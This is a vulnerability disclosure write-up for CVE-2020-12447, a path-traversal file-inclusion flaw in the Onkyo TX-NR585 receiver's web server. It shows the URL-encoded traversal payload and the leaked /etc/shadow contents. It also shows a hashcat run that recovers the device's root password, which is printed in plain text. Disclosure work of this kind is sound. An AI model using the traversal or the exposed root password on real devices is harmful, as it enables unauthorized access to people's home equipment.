CVE-2020-12447 LFI Within Onkyo TX-NR585 Web Interface
Known Affected Versions: TX-NR585 Firmware Version 1000-0000-000-0008-0000
Within the Onkyo TX-NR585 Radio Reciever there is a local file inclusion vulnerability that can be exploited on the built in webserver(s) on the device. A weakly implemented filter can be bypassed with basic URL encoding techniques (%2e%2e%2f) to expose sensitive files on the system
Steps to reproduce:
Locate the Onkyo Reciever on your network
Access any of the web servers running on the device, several can be found by running a simple nmap scan:
[email protected]:~#nmap -sT -vvv 192.168.0.80 Reason: 993 no-responses PORT STATE SERVICE REASON 80/tcp open http syn-ack 5000/tcp open upnp syn-ack 8008/tcp open http syn-ack 8009/tcp open ajp13 syn-ack 8080/tcp open http-proxy syn-ack 8888/tcp open sun-answerbook syn-ack 10001/tcp open scp-config syn-ack
In the above example, I tested 8080 for Local File Inclusion.
- Capture a HTTP Request to the reciever in Burpsuite and send it into Repeater with Control + R
- Modify the URL to %2e%2e%2f to traverse back a directory, creating several sets of these, we are able to hit the root of the file system, from there we can then attempt to disclose a sensitive file (such as /etc/shadow as seen in the screenshot below)
Sucess, we have disclosed a sensitive file on the system. LFI has been achieved.
For fun, now we have the password hashes out of /etc/shadow, lets try and crack it!
root:$6$cUc04nYlQ1/HUOZz$3kbNjY7RyuznIr1VotKXo.t73ws5sF8GFeE7wgMPPO/TubEbYc59EErqg4MDHyVsmTGxVi279wmJZySHjGT3H0:16610:0:99999:7::: daemon:*:16610:0:99999:7::: bin:*:16610:0:99999:7::: sys:*:16610:0:99999:7::: sync:*:16610:0:99999:7::: games:*:16610:0:99999:7::: man:*:16610:0:99999:7::: lp:*:16610:0:99999:7::: mail:*:16610:0:99999:7::: news:*:16610:0:99999:7::: uucp:*:16610:0:99999:7::: proxy:*:16610:0:99999:7::: www-data:*:16610:0:99999:7::: backup:*:16610:0:99999:7::: list:*:16610:0:99999:7::: irc:*:16610:0:99999:7::: gnats:*:16610:0:99999:7::: nobody:*:16610:0:99999:7::: chrome:!:16610:0:99999:7::: messagebus:!:16610:0:99999:7::: ntp:!:16610:0:99999:7::: avahi-autoipd:!:16610:0:99999:7:::
Loading the root password hash into hashcat, we are able to crack it relatively quickly, in about a minutes time:
.\hashcat.exe -m 1800 -a 0 ..\onkyo.hash E:\Wordlists\rockyou.txt hashcat (v5.1.0-1770-g2c94c003) starting... $6$cUc04nYlQ1/HUOZz$3kbNjY7RyuznIr1VotKXo.t73ws5sF8GFeE7wgMPPO/TubEbYc59EErqg4MDHyVsmTGxVi279wmJZySHjGT3H0:morimori Session..........: hashcat Status...........: Cracked Hash.Name........: sha512crypt $6$, SHA512 (Unix) Hash.Target......: $6$cUc04nYlQ1/HUOZz$3kbNjY7RyuznIr1VotKXo.t73ws5sF8...jGT3H0 Time.Started.....: Mon Apr 27 00:58:27 2020 (33 secs) Time.Estimated...: Mon Apr 27 00:59:00 2020 (0 secs) Guess.Base.......: File (E:\Wordlists\rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 18675 H/s (10.38ms) @ Accel:1 Loops:64 Thr:1024 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 614400/14344384 (4.28%) Rejected.........: 0/614400 (0.00%) Restore.Point....: 599040/14344384 (4.18%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000 Candidates.#1....: poptart15 -> mizzmoss Hardware.Mon.#1..: Temp: 50c Fan: 0% Util: 99% Core:1987MHz Mem:3802MHz Bus:8 Started: Mon Apr 27 00:58:00 2020 Stopped: Mon Apr 27 00:59:01 2020
Interesting, the cracked password is morimori, which is a Japanese word: もりもり. This actually makes a bit of sense seeing that Onkyo is a Japanese company.
A speical thanks to @OrielOrielOriel for being there every step of the way. From intiially finding the vulnerability to being with me while submitting the CVE. She’s played an imporant role and I can’t thank her enough <3